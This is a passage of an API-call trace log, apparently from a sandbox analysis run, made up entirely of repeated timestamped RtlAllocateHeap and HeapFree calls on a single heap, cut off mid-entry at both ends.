hHeap=0x6e0000) returned 1 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.729] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.729] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.730] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.730] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.731] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.731] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.733] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.733] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.734] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.734] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.735] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.735] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, 